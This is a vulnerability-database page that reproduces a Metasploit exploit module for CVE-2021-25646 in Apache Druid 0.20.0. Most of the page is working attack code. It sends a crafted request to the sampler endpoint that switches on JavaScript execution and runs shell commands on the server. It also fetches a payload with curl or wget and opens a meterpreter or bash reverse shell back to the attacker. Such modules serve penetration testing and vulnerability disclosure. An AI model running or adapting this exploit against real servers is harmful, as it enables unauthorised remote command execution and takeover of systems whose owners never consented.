Vulners
Lucene search
Apache Druid 0.20.0 Remote Command Execution
🗓️ 26 Apr 2021 17:42:23Reported by Litch1, Security Team of Alibaba Cloud, je5442804Type 
metasploit🔗 www.rapid7.com👁 199 Views
| Reporter | Title | Published | Views | Family All 25 |
|---|---|---|---|---|
 | Apache Druid 0.20.0 Remote Command Execution Exploit | 27 Apr 202100:00 | – | zdt |
 | Exploit for CVE-2021-25646 | 12 Dec 202114:40 | – | githubexploit |
| Exploit for CVE-2021-25646 | 4 Feb 202112:51 | – | githubexploit |
| Exploit for CVE-2021-25646 | 3 Feb 202103:59 | – | githubexploit |
 | Security Bulletin: Vulnerability in Apache Druid affects watsonx.data | 5 Sep 202417:49 | – | ibm |
 | CVE-2021-25646 | 29 Jan 202100:00 | – | attackerkb |
 | Apache Druid < 0.20.1 RCE (Direct Check) | 30 Mar 202100:00 | – | nessus |
 | CVE-2021-25646 | 5 Feb 202123:22 | – | circl |
 | Apache Druid 访问控制错误漏洞 | 29 Jan 202100:00 | – | cnnvd |
 | Apache Druid Access Control Error Vulnerability | 1 Feb 202100:00 | – | cnvd |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Apache Druid 0.20.0 Remote Command Execution',
'Description' => %q{
Apache Druid includes the ability to execute user-provided JavaScript code embedded in
various types of requests; however, that feature is disabled by default.
In Druid versions prior to `0.20.1`, an authenticated user can send a specially-crafted request
that both enables the JavaScript code-execution feature and executes the supplied code all
at once, allowing for code execution on the server with the privileges of the Druid Server process.
More critically, authentication is not enabled in Apache Druid by default.
Tested on the following Apache Druid versions:
* 0.15.1
* 0.16.0-iap8
* 0.17.1
* 0.18.0-iap3
* 0.19.0-iap7
* 0.20.0-iap4.1
* 0.20.0
* 0.21.0-iap3
},
'Author' => [
'Litch1, Security Team of Alibaba Cloud', # Vulnerability discovery
'je5442804' # Metasploit module
],
'References' => [
['CVE', '2021-25646'],
['URL', 'https://lists.apache.org/thread.html/rfda8a3aa6ac06a80c5cbfdeae0fc85f88a5984e32ea05e6dda46f866%40%3Cdev.druid.apache.org%3E'],
['URL', 'https://github.com/yaunsky/cve-2021-25646/blob/main/cve-2021-25646.py']
],
'DisclosureDate' => '2021-01-21',
'License' => MSF_LICENSE,
'Targets' => [
[
'Linux (dropper)', {
'Platform' => 'linux',
'Type' => :linux_dropper,
'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', 'CmdStagerFlavor' => 'curl' },
'CmdStagerFlavor' => %w[curl wget],
'Arch' => [ARCH_X86, ARCH_X64]
}
],
[
'Unix (in-memory)', {
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
}
],
],
'DefaultTarget' => 0,
'Privileged' => false,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options([
Opt::RPORT(8888),
OptString.new('TARGETURI', [true, 'The base path of Apache Druid', '/'])
])
end
def execute_command(cmd, _opts = {})
gencmd = '/bin/sh`@~-c`@~' + cmd
genvar = Rex::Text.rand_text_alpha(8..12)
genname = Rex::Text.rand_text_alpha(8..12)
vprint_status("cmd= #{gencmd} var=#{genvar} name=#{genname}")
post_data = {
type: 'index',
spec: {
ioConfig: {
type: 'index',
firehose: {
type: 'local',
baseDir: '/etc',
filter: 'passwd'
}
},
dataSchema: {
dataSource: Rex::Text.rand_text_alpha(8..12),
parser: {
parseSpec: {
format: 'javascript',
timestampSpec: {},
dimensionsSpec: {},
function: "function(){var #{genvar} = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"#{gencmd}\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"#{rand(1..9999999)}\",#{genname}: #{genvar}}}",
"": {
enabled: 'true'
}
}
}
}
},
samplerConfig: {
numRows: 10
}
}.to_json
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/druid/indexer/v1/sampler'),
'ctype' => 'application/json',
'headers' => {
'Accept' => 'application/json, text/plain, */*'
},
'data' => post_data
})
end
def check
genecho = Rex::Text.rand_text_alphanumeric(16..32).gsub(/A/, 'a')
vprint_status("Attempting to execute 'echo #{genecho}' on the target.")
res = execute_command("echo #{genecho}")
unless res
return CheckCode::Unknown('Connection failed.')
end
unless res.code == 200
return CheckCode::Safe
end
if res.body.include?(genecho)
return CheckCode::Vulnerable
end
CheckCode::Unknown('Target does not seem to be running Apache Druid.')
end
def exploit
case target['Type']
when :linux_dropper
execute_cmdstager
when :unix_memory
execute_command(payload.encoded)
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Feb 2026 18:58Current
9High risk
Vulners AI Score9
CVSS 3.18.8
CVSS 29
EPSS0.93939